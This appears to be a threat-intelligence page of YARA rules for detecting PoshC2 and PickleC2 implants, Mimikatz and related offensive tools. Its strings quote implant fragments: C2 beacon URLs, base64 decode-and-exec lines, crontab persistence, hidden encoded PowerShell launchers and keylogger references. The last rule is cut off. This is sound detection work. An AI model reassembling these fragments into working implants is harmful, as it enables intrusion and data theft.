| Details |
Yara rule |
1 |
|
import "hash"
rule PickleC2 {
meta:
description = "PickleC2 - powershell.ps1"
sha256 = "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
strings:
$s1 = "function Execute($key,$ip,$port,$implant_name,$sleep_time){" ascii fullword
$s2 = "Execute $key $ip $port $implant_name $sleep_time" ascii fullword
$s3 = " $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*"
$s4 = " $process.startInfo.UseShellExecute = $false" ascii fullword
$s5 = " $Hostname = \"Machine_Name(\"+ [System.Net.Dns]::GetHostByName($NULL).Hostname + \")\"" ascii fullword
$s6 = " $data = (Invoke-WebRequest -UseBasicParsing -Uri $file_download -Method 'POST').Content" ascii fullword
$s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword
$s8 = " $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*"
$s9 = " $process.StandardOutput.ReadToEnd() + $process.StandardError.ReadToEnd() " ascii fullword
$s10 = " $cmd = \"cmd.exe\"" ascii fullword
$s11 = " $file_download = \"ht\" + 'tp:' + \"//\" + $ip + \":$port/task/$implant_name/file.ret\"" ascii fullword
$s12 = " elseif ($binary -eq \"execute\"){" ascii fullword
$s13 = " -join ',').replace('IPAddressToString,-----------------,','').replace(\" \",\"\") + \")\"" ascii fullword
$s14 = " $cmd = \"powershell.exe\"" ascii fullword
$s15 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword
$s16 = " $task_req = (Invoke-WebRequest -UseBasicParsing -Uri $task -Method 'GET').Content" ascii fullword
$s17 = " $task = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/task/$implant_name\"" ascii fullword
$s18 = " $result = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/result/$implant_name\"" ascii fullword
$s19 = " $process.startInfo.RedirectStandardError = $true" ascii fullword
$s20 = " $results = Encrypt-String $key \"Downloaded\"" ascii fullword
condition:
hash.sha256(0, filesize) == "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1" or uint16(0) == 0x7566 and filesize < 20KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
import "pe"
rule PoshC2_Csc {
meta:
description = "PoshC2 - csc.exe"
sha256 = "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
strings:
$s1 = "csc.exe" ascii fullword
$s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
$s3 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
$s4 = "Microsoft.CodeAnalysis" ascii fullword
$s5 = "lpThreadId" ascii fullword
$s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
$s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
$s8 = "lpAddress" ascii fullword
$s9 = "Protection" ascii fullword
$s10 = "Program" ascii fullword
$s11 = "lpStartAddress" ascii fullword
$s12 = "RefSafetyRulesAttribute" ascii fullword
$s13 = "flNewProtect" ascii fullword
$s14 = "lpflOldProtect" ascii fullword
$s15 = " </trustInfo>" ascii fullword
$s16 = "EmbeddedAttribute" ascii fullword
$s17 = "dwStackSize" ascii fullword
$s18 = "#REPLACEME64#" wide fullword
$s19 = "#REPLACEME32#" wide fullword
$s20 = "System.Runtime.CompilerServices" ascii fullword
$s21 = "FromBase64String" ascii fullword
condition:
hash.sha256(0, filesize) == "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_DynamicCode {
meta:
description = "PoshC2 - DynamicCode.exe"
sha256 = "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
strings:
$s1 = "DynamicCode.exe" ascii fullword
$s2 = "Dynamic Code executed successfully" wide fullword
$s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
$s4 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
$s5 = "Microsoft.CodeAnalysis" ascii fullword
$s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
$s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
$s8 = "Program" ascii fullword
$s9 = "Console" ascii fullword
$s10 = "RefSafetyRulesAttribute" ascii fullword
$s11 = " </trustInfo>" ascii fullword
$s12 = "EmbeddedAttribute" ascii fullword
$s13 = "PoshC2DynamicCode" ascii fullword
$s14 = "System.Runtime.CompilerServices" ascii fullword
$s15 = "System" ascii fullword
$s16 = " </requestedPrivileges>" ascii fullword
condition:
hash.sha256(0, filesize) == "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f" or uint16(0) == 0x5a4d and filesize < 10KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_Fcomm {
meta:
description = "PoshC2 - fcomm.exe"
sha256 = "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
strings:
$s1 = "fcomm.exe" ascii fullword
$s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
$s3 = "ParseCommandLineArgs" ascii fullword
$s4 = "run-dll-background" wide fullword
$s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
$s6 = "HostInfo" ascii fullword
$s7 = "GetCurrentTasking" ascii fullword
$s8 = "objContents" ascii fullword
$s9 = "get_Actioned" ascii fullword
$s10 = "CreateEncryptionAlgorithm" ascii fullword
$s11 = "run-dll" wide fullword
$s12 = "run-exe Core.Program Core " wide fullword
$s13 = "initialised" ascii fullword
$s14 = "loadmodule" wide fullword
$s15 = "[!] This is not implemented yet in FComm implant types." wide fullword
$s16 = "Microsoft.CodeAnalysis" ascii fullword
$s17 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
$s18 = "SafeFileRead" ascii fullword
$s19 = "FCommConnect" ascii fullword
$s20 = "GzipCompress" ascii fullword
condition:
hash.sha256(0, filesize) == "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c" or uint16(0) == 0x5a4d and filesize < 40KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
rule pentest_tool_botb {
meta:
description = "Detects Break Out The Box"
author = " [email protected] "
date = "2021-06-28"
license = "Apache License 2.0"
hash1 = "3aae4a2bf41aedaa3b12a2a97398fa89a9818b4bec433c20b4e724505277af83"
strings:
$ = "github.com/brompwnie/botb" ascii wide
$ = "/Users/cleroy/go/src" ascii wide
$ = "Data uploaded to" ascii wide
$ = "Break Out The Box" ascii wide
condition:
all of them
} |
| Details |
Yara rule |
1 |
|
rule M_Hunting_Win_ConventionEngine_PDB_Attestation_Multiple_1 {
meta:
author = "Mandiant"
date_created = "2022-10-20"
description = "Looking for PDB path strings that has been observed in malicious samples which were attestation signed"
strings:
$anchor = "RSDS"
$pdb1 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}gamehacks.{0,250}boot_driver.{0,250}\.pdb\x00/ nocase
$pdb2 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}MyDriver1.{0,250}wfp_vpn.{0,250}\.pdb\x00/ nocase
$pdb3 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}FilDriverx64_win10.{0,250}\.pdb\x00/ nocase
$pdb4 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}RedDriver_win10.{0,250}\.pdb\x00/ nocase
$pdb5 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}sellcode.{0,250}MyDriver.{0,250}\.pdb\x00/ nocase
$pdb6 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}Users\\ljl11{0,250}\.pdb\x00/ nocase
$pdb7 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}RkDriver64.{0,250}MyDriver1.{0,250}\.pdb\x00/ nocase
$pdb8 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}\\ApcHelper.{0,250}TSComputerManager.{0,250}\.pdb\x00/ nocase
condition:
(uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and filesize < 20MB and $anchor and (1 of ($pdb*))
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_Pbind {
meta:
description = "PoshC2 - pbind.exe"
sha256 = "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
strings:
$s1 = "pbind.exe" ascii fullword
$s2 = "[+] Running task in background, run get-bg to get background output." wide fullword
$s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
$s4 = "ParseCommandLineArgs" ascii fullword
$s5 = "run-dll-background" wide fullword
$s6 = "[*] Only run one task in the background at a time per implant." wide fullword
$s7 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
$s8 = "#REPLACEPBINDPIPENAME#" wide fullword
$s9 = "CreateEncryptionAlgorithm" ascii fullword
$s10 = "run-dll" wide fullword
$s11 = "run-exe Core.Program Core " wide fullword
$s12 = "$[-] Cannot read from pipe" wide fullword
$s13 = "loadmodule" wide fullword
$s14 = "[-] No output" wide fullword
$s15 = "Microsoft.CodeAnalysis" ascii fullword
$s16 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
$s17 = "GzipCompress" ascii fullword
$s18 = "#REPLACEKEY#" wide fullword
$s19 = "Error loading modules {0}" wide fullword
$s20 = "run-exe-background" wide fullword
$s21 = "Invoke" wide fullword
condition:
hash.sha256(0, filesize) == "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383" or uint16(0) == 0x5a4d and filesize < 40KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_Sharp_Powershell_Runner {
meta:
description = "PoshC2 Sharp_Powershell_Runner.exe"
sha256 = "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
strings:
$s1 = "Sharp_Powershell_Runner.exe" ascii fullword
$s2 = "basepayload" ascii fullword
$s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
$s4 = "get_SessionStateProxy" ascii fullword
$s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
$s6 = "get_PSVariable" ascii fullword
$s7 = "Sharp_Powershell_Runner" ascii fullword
$s8 = "InvokeAutomation" ascii fullword
$s9 = "Microsoft.CodeAnalysis" ascii fullword
$s10 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
$s11 = "DllBaseAddress" ascii fullword
$s12 = "RunspaceInvoke" ascii fullword
$s13 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
$s14 = "$o = IEX $c | Out-String" wide fullword
$s15 = "Program" ascii fullword
$s16 = "Encoding" ascii fullword
$s17 = "RefSafetyRulesAttribute" ascii fullword
$s18 = " </trustInfo>" ascii fullword
$s19 = "EmbeddedAttribute" ascii fullword
$s20 = "baseAddr" ascii fullword
condition:
hash.sha256(0, filesize) == "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "pe"
import "hash"
rule PoshC2_Dropper {
meta:
description = "PoshC2 - dropper.exe"
sha256 = "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
strings:
$s1 = "AppPolicyGetProcessTerminationMethod" ascii fullword
$s2 = " Type Descriptor'" ascii fullword
$s3 = "operator co_await" ascii fullword
$s4 = "operator<=>" ascii fullword
$s5 = ".data$rs" ascii fullword
$s6 = "api-ms-win-appmodel-runtime-l1-1-2" wide fullword
$s7 = " Class Hierarchy Descriptor'" ascii fullword
$s8 = " Base Class Descriptor at (" ascii fullword
$s9 = " Complete Object Locator'" ascii fullword
$s10 = "__swift_3" ascii fullword
$s11 = "__swift_2" ascii fullword
$s12 = ".rdata$voltmd" ascii fullword
$s13 = "xWI96tRI" ascii fullword
$s14 = " delete[]" ascii fullword
$s15 = "__swift_1" ascii fullword
$s16 = "vKfffff" ascii fullword
$s17 = "D$0@8{" ascii fullword
$s18 = "api-ms-win-core-file-l1-2-4" wide fullword
$s19 = "api-ms-win-core-file-l1-2-2" wide fullword
$s20 = " delete" ascii fullword
condition:
hash.sha256(0, filesize) == "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4" or pe.sections[4].name == "_RDATA" and pe.imports("kernel32.dll", "WriteProcessMemory") and pe.imports("kernel32.dll", "CreateRemoteThread") and pe.imports("kernel32.dll", "OpenProcess") and pe.imports("kernel32.dll", "TerminateProcess") and uint16(0) == 0x5a4d and filesize < 300KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_DotNet2JS {
meta:
description = "PoshC2 - DotNet2JS.js"
sha256 = "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
strings:
$s1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s2 = "AAAAAAAAAAAAAAAAAAAAAAAAA"
$s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s4 = "AAAAAAAAAAAAAEAAAE"
$s5 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s6 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"
$s7 = "AAAAAAAAAAAAAAAAAAAAAAAAB"
$s8 = "AAAAAAAAAAD"
$s9 = "AAAAAAAAAEA"
$s10 = "AAAAAAAAAAAAAAAAAAAAAAAAAAABD"
$s11 = "AADAAAABAAAA"
$s12 = "AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB"
$s13 = "ADAAAAA4AA"
$s14 = "AAAAAAAAAAAAAE4A"
$s15 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA"
$s16 = "AABAACAAAEAA"
$s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA"
$s18 = "function dbg(s) {WScript.Echo(s);}" ascii fullword
$s19 = "var ba = enc.GetBytes_4(b);" ascii fullword
$s20 = "var length = enc.GetByteCount_2(b);" ascii fullword
condition:
hash.sha256(0, filesize) == "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53" or uint16(0) == 0x6176 and filesize < 30KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_DropperPy {
meta:
description = "PoshC2 - dropper.py"
sha256 = "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"
strings:
$s1 = "if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword
$s2 = "if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword
$s3 = "if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})" ascii fullword
$s4 = "else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword
$s5 = "else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword
$s6 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))" ascii fullword
$s7 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))" ascii fullword
$s8 = "else: r=urllib2.Request(url,headers={'User-agent':ua})" ascii fullword
$s9 = "hn=socket.gethostname();o=urllib2.build_opener()" ascii fullword
$s10 = "exec(base64.b64decode(x))" ascii fullword
$s11 = "html = response.read().decode('utf-8');x=decrypt(key, html)" ascii fullword
$s12 = "ua=\"#REPLACEUSERAGENT#\"" ascii fullword
$s13 = "url=serverclean[0]+\"#REPLACEQUICKCOMMAND#\"" ascii fullword
$s14 = "res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');" ascii fullword
$s15 = "serverclean=[#REPLACEHOSTPORT#]" ascii fullword
$s16 = "pykey=\"#REPLACESPYTHONKEY#\"" ascii fullword
$s17 = "if pykey in b and pyhash == s and cstr < kdn: " ascii fullword
$s18 = "import os,sys,base64,ssl,socket,pwd,hashlib,time" ascii fullword
$s19 = "kdn=time.strptime(\"#REPLACEKILLDATE#\",\"%Y-%m-%d\")" ascii fullword
$s20 = "cstr=time.strftime(\"%Y-%m-%d\",time.gmtime());cstr=time.strptime(cstr,\"%Y-%m-%d\")" ascii fullword
condition:
hash.sha256(0, filesize) == "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7" or uint16(0) == 0x6d69 and filesize < 6KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_ImplantCorePy {
meta:
description = "PoshC2 - Implant-Core.py"
sha256 = "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"
strings:
$x1 = " # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/"
$x2 = " # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/"
$s3 = " s.call(\"crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -\" %% filename, shell=True)" ascii fullword
$s4 = " modpayload = modb64logger.replace(\"REPLACEME\",filename)" ascii fullword
$s5 = " returnval = \"%%s \\\\r\\\\nKeylogger started here: %%s\" %% (pids, filename)" ascii fullword
$s6 = " filename = \"%%s/%%s_psh.sh\" %% (dircontent, uuid.uuid4().hex)" ascii fullword
$s7 = " dircontent = \"%%s/.%%s\" %% (os.environ['HOME'], uuid.uuid4().hex)" ascii fullword
$s8 = " if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi"
$s9 = " returnval = \"Ran Start Another Implant - File dropped: %%s\" %% filename" ascii fullword
$s10 = " returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)" ascii fullword
$s11 = " aes = get_encryption(key, iv)" ascii fullword
$s12 = " if hh[0]: req=urllib2.Request(server,headers={'Host':str(hh[0]),'User-agent':str(ua)})" ascii fullword
$s13 = " import subprocess as s" ascii fullword
$s14 = "modules/python/collection/osx/keylogger.py" ascii fullword
$s15 = " if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi"
$s16 = " postcookie = encrypt(key, taskId).decode(\"utf-8\")" ascii fullword
$s17 = " import subprocess" ascii fullword
$s18 = " exec(modpayload)" ascii fullword
$s19 = " s.call(\"crontab -l | { cat; } | grep -v '_psh.sh'| crontab -\", shell=True)" ascii fullword
$s20 = " modb64logger = base64.b64decode(b64logger)" ascii fullword
condition:
hash.sha256(0, filesize) == "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88" or uint16(0) == 0x6d69 and filesize < 40KB and 1 of ($x*) and 4 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_ImplantCorePs1 {
meta:
description = "PoshC2 - Implant-Core.ps1"
sha256 = "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"
strings:
$x1 = "$payloadraw = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)\"" ascii fullword
$s2 = "$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))" ascii fullword
$s3 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri"
$s4 = "$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)" ascii fullword
$s5 = "g(`\"$EncodedCompressedScript`\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\"" ascii fullword
$s6 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword
$s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword
$s8 = "$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)" ascii fullword
$s9 = "$payload = $payloadraw -replace \"`n\", \"\"" ascii fullword
$s10 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri"
$s11 = " [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte"
$s12 = " [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte"
$s13 = " $splitcmd = $ReadCommandClear -replace \"multicmd\",\"\"" ascii fullword
$s14 = " $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte"
$s15 = " if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app"
$s16 = " $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte"
$s17 = " if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app"
$s18 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword
$s19 = "dData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()" ascii fullword
$s20 = " if (($ReadCommandClear) -and ($ReadCommandClear -ne \"fvdsghfdsyyh\")) {" ascii fullword
condition:
hash.sha256(0, filesize) == "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2" or uint16(0) == 0x6b24 and filesize < 40KB and 1 of ($x*) and 4 of them
} |
| Details |
Yara rule |
1 |
|
import "hash"
rule PoshC2_PbindPs1 {
meta:
description = "PoshC2 - pbind.ps1"
sha256 = "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"
strings:
$s1 = " $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" ascii fullword
$s2 = " $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" ascii fullword
$s3 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword
$s4 = " $encCommand2 = Encrypt-String -unencryptedString $res -Key $key" ascii fullword
$s5 = " $encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key $key" ascii fullword
$s6 = " $encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key $key" ascii fullword
$s7 = "$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pname,'InOut',100, 'Byte', 'None', 4096, 4096, $PipeSecurity)" ascii fullword
$s8 = " if ($decCommand -eq 'KILLPIPE'){exit}" ascii fullword
$s9 = "invoke-pserv -secret #REPLACEPBINDSECRET# -key #REPLACEKEY# -pname #REPLACEPBINDPIPENAME#" ascii fullword
$s10 = " $command = $pipeReader.ReadLine()" ascii fullword
$s11 = "$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity" ascii fullword
$s12 = "$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( 'Everyone', 'ReadWrite', 'Allow' )" ascii fullword
$s13 = " $command = $pipeReader.ReadLine()" ascii fullword
$s14 = " $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)" ascii fullword
$s15 = " $fileContentBytes = [System.Text.Encoding]::Unicode.GetBytes($res)" ascii fullword
$s16 = " [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)" ascii fullword
$s17 = " {$aesManaged.Key = [System.Convert]::FromBase64String($key)}" ascii fullword
$s18 = " $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)" ascii fullword
$s19 = " if ($decCommand -eq 'EXIT') { break }" ascii fullword
$s20 = " $encSure = Encrypt-String -unencryptedString 'SURE' -Key $key" ascii fullword
condition:
hash.sha256(0, filesize) == "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7" or uint16(0) == 0x7566 and filesize < 10KB and 8 of them
} |
| Details |
Yara rule |
1 |
|
rule mi_mimikatz_11462 {
meta:
description = "Mimikatz - file mi.ps1"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2022-05-01"
hash1 = "d00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b"
strings:
$x1 = "$best64code = \"==gCNkydtdnbrpXbttmc01mazp2bkgCWFlkCNkSKoo3ZtNnatpHayBHJuMXb3RHanNne1FXarhGJo4Wa0R3b3Fnerl3a3RiLr5GcnBHcutmcnpGd"
$s2 = "lFM5cmbFVFMatSYLlTdTN2QCdXZyg2QsJVYGFEZiJERBV3T0ZVaYJGZZx2Kx4GSXxGdll1LSJ2R5F2d5J3N3VjSRtUZzgDUmpFOap1TwI3bKpHVDFlNL9GUQJTdwYUUr"
$s3 = "JFT0omerhFawNXbDVVcIdXZ1REOyMUVXBHVZpWZvUGN6dUMp9ycysCbtBXY5IUVSFVbiNXVtJUYVRFeD5mVYtEMIt0SiB3blZmTHlUWrUmV4RXdr80bw12QuVTQtx2LV"
$s4 = "x0dGlHUFpUYhV1YXVjR4N1b3p0cVRTTj10TxRFNxhnVEdHd5lGWPNTNFdjexRkNzl2MPtie0RWcnJXQ3djbIN0didHMzJTM5NmS01GaB50Z2VGSJVFOyZGd5hlN1BDMR"
$s5 = "R1TVhlRO10QXtiU4s2UrNEeXp1QDFzblRHb2UmZLFTdsJFR2BDcmdVesdnQKVWZ21GOQ5kaTdGTRJ1UXNzMVdDU4NHa0p0V3MDeEVFaExEcpBVQzQlY5g0bRV0N1lkQq"
$s6 = "RUUERUNw5UdSZ3bpp0cVVmeRpVVMx2R1ETZIZzYGhEd6J3VidHT3IUMUhHasR3cwAnM2sST5pUZiNVcjFlcSR3cTJkcmdzKZhkTzNGWzJmZ5N1a6lGbZFXSvEzMFBzRa"
$s7 = "lnMkxERH9EMiRmW4k2doBDS6dXdLlDM4VmRrlTWwMmSmFnNCV1YLdjN0sCUp9WST9SYHlkYaRWb5R3L0oVNn50am9EU6hkV0InYCNmWv4WTktUSxdnW0gET25GNxsWO4"
$s8 = "NzTyIXSJdFMip1ZrNVY1VzQStCVatEdm92ZU1Wc09SYNt0LRBnYPlEchV1RJN3ZLBlVtRlM2FDNWR0RSZ3d30mUNpHWD52SQFTNQtiS2kEalx0dll3UzQ2NGVEVIl0YT"
$s9 = "hzQ0QVYxhXWNdDN2lzd0JUR582TUhzaCJmVQhHaLp0c5VkWpNnQhh2QhJDO3oVSwczUkR0MyMkcwAldwJDbOd0SNJEVil0QVF3NGFkez5UYMZUQzgUM3gFOGhGRzU2Vw"
$s10 = "5mMnVDcohGWUVmbjlDWHFmVv8SY3ZGTrdja3k2TOd3KMBlUstmWrNzYyQzKwIzKzknQYlzKrknYlJndTFleDdnWV5Uc04kNYRldll3LaJjckBTMVp0cPZlZ1Y0MpZkS1"
$s11 = "F0KtlDetp0c4BnaBVXWERnczUWRPN2KDVTMkh1dFdFaKNmYKRGMrMHan5UbrRGMzIXcvlFe1J0Z0dUMPRFSvlndo9mSkpWQTV1SyNFZLFHRnVWRP5EcjJGcBp3L1c3am"
$s12 = "QWb5Z0UhJFUwgETQdGMxATdUdXcXRHcTVTMrQEe6JEWBxUTVhGR1hGULp1Vx8UQLRncYBnaN9mVDBFazcnbRFTSJpXTuZDS4dTd0l0ZGJTUYlUSwIEcIFDcnF0Zip0cJ"
$s13 = "RVUm9GcjV0MwQGV3NGWxMWVSRDMNJHevdUMpFHVxMXQyp3VrcHVJdGeJtUQvMXb3dUZ4cERUdHN3FFSQ5kdL9kap5ENmJ3TDVESHN0SCZlQXJDc2BDOIlmNxxUY0RkN2"
$s14 = "FzUZxWejZWMmV2ZpdjTxg3arMnQCB1LvoXY4kVdkFEeM1GcwB3TDllMFZGeTF3Z4MzRSR2KTBFaz8EWzBlQlJ0ckNHTpd2KwkURpBXQWF1ZjRTRqlVNvImYmF0bmtUYV"
$s15 = "NnW3oHNkZ3NY9mMTtmbNJTQx8WdNl3NCtCZGpVOMdUT2BzUWFTW5UjZu9CRIdHcLJzNoZTThhkVwgDOGdXM2B1dLlzUI9SQrllTqVkbst0TywmUwcXTPJmRvFFTPhEeh"
$s16 = "JUbL5WZxMXQux2bMNFNHhkVh1mY59UQP50Kp52N2FHa1ZHexcXN1oHRMhkes9icpZXU0VTc050VGZDOidUMPZDW0NkNwNjWxVHNrUUVvJmQ4p1LY10ZyFHTBBXcIZ2aZ"
